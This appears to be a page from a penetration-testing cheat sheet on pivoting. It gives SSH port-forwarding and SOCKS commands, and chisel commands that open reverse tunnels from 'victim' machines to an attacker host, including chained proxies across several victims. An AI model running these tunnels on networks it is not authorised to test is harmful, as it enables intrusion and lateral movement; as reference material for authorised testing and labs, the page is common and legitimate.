👾Pivot

How to access more subnets.

Port Forwarding

Using SSH

To access a locally exposed service on a remote machine :

ssh -L YOUR_PORT:localhost:PORT_EXPOSED USERNAME@IP_ADDRESS

Using chisel

To redirect a port (here, 3000) when you’re in a docker for example (victim = 172.17.0.1 and your host = 10.10.16.8). Firstly, run a chisel server on your host :

./chisel server -p 5555 --reverse

Then, on the docker, redirect to your host from the victim machine :

./chisel client 10.10.16.8:5555 R:8890:172.17.0.1:3000

Then you can access the service with http://localhost:8890/.

SOCKS Tunnels

SSH

ssh -D 1080 -q -N -i id_rsa [email protected]

Chisel

Best tool ever for pivoting. Just launch one server on your host and any client as you wish on different victim machines. Get the latest version, exist for linux and windows : https://github.com/jpillora/chisel.

On attacking machine (kali) :

./chisel server -p 5555 --reverse

On the victim machine :

./chisel client 10.10.15.243:5555 R:1080:socks

Then you can chain SOCKS proxy :

#Victim 2 
./chisel client 10.10.15.243:5555 R:2080:socks
#Victim 3 
./chisel client 10.10.15.243:5555 R:3080:socks
#Victim 4
./chisel client 10.10.15.243:5555 R:4080:socks

And do not forget to modify your proxychains config file to use the SOCKS you want.

PreviousAuthenticated NextTips

Last updated 1 year ago